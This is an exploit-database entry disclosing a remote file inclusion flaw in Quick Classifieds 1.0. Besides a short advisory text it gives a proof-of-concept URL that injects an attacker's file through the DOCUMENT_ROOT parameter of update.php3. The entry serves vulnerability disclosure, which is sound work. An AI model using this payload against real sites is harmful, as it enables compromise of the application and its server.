Quick Classifieds 1.0 - controlcenterupdate.php3?DOCUMENT_ROOT Remote File Inclusion

2008-03-24T00:00:00
ID EXPLOITPACK:51AE5E9BA5A89E8A3A28BAB14A19FB6D
Type exploitpack
Reporter ZoRLu
Modified 2008-03-24T00:00:00

Description

Quick Classifieds 1.0 - controlcenterupdate.php3?DOCUMENT_ROOT Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/28417/info
          
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
          
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
          
Quick Classifieds 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt?